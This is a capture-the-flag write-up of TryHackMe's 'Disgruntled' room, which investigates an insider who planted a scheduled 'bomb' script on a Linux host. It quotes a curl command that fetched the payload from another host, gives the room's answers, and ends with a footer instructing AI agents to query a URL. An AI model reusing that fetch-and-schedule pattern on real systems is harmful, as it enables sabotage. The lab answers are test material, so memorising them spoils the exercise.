# Disgruntled TryHackMe #### Task 3 Nothing suspicious... So far Here’s the machine our disgruntled IT user last worked on. Check if there’s anything our client needs to be worried about. My advice: Look at the privileged commands that were run. That should get you started. Q1) The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND? {% hint style="info" %} Check the sudo execution history.![](chrome-extension://amfojhdiedpdnlijjbhjnhokbnohfdfb/img/logo/icon@2x.png) {% endhint %} We can investigate the bash\_history file under the /home directory \

sudo apt install dokuwiki **Ans : /usr/bin/apt install dokuwiki** **Q2)** What was the present working directory (PWD) when the previous command was run?
by looking in the /home **Ans : /home/cybert** #### Task 4 Let’s see if you did anything bad Keep going. Our disgruntled IT was supposed to only install a service on this computer, so look for commands that are unrelated to that. Q3) Which user was created after the package from the previous task was installed? By looking in the Second photos we found **sudo adduser it-admin** **Ans : it-admin** **Q4) A user was then later given sudo priveleges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)**
let's investigate log files ``` vim /var/log/auth.log ```

I found IT

#### Ans : Dec 28 06:27:34 **Q5) A script file was opened using the "vi" text editor. What is the name of this file?** remember the created acount , let's investigate bash history in it

**Ans : bomb.sh** #### Task 5 Bomb has been planted. But when and where? That `bomb.sh` file is a huge red flag! While a file is already incriminating in itself, we still need to find out where it came from and what it contains. The problem is that the file does not exist anymore. **Q6) What is the command used that created the file bomb.sh?** **From the prev screen** **Ans : curl 10.10.158.38:8080/bomb.sh --output bomb.sh** **Q7 The file was renamed and moved to a different directory. What is the full path of this file now?**
The vi text editor can edit and save files to a different location let's investigate viminfo

**Ans : /bin/os-update.sh** **Q8 ) When was the file from the previous question last modified? (Format: Month Day HH:MM)**

**Ans : Dec 28 06:29** **Q9) What is the name of the file that will get created when the file from the first question executes?**

**Ans : goodbye.txt** #### Task 6 Following the fuse So we have a file and a motive. The question we now have is: how will this file be executed? **Q10 ) At what time will the malicious file trigger? (Format: HH:MM AM/PM)**

by going to

\ **Ans : 08:00 Am** **I think the challange it's not easy , its very easy** :smile: <3
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmedhat.gitbook.io/whoami/writesup/disgruntled-tryhackme.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.